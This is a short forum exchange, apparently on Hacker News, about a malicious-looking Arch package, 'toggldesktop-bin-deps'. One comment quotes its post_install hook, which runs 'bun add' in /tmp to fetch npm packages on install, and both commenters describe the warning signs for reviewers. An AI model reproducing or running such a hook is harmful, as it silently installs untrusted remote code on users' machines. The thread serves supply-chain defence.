| ▲ | Tharre 2 hours ago | |
From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line: > install=toggldesktop-bin-deps.install And the toggldesktop-bin-deps.install contains this: > post_install() {{ > cd /tmp > bun add axios uuid ora js-digest > }} Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you checkout what packages it actually installs. | ||
| ▲ | codemac 35 minutes ago | parent [-] | |
Exactly, these hacks really stand out to me, and used odd patterns (like .install files that just had 2-3 line post_install functions) etc. | ||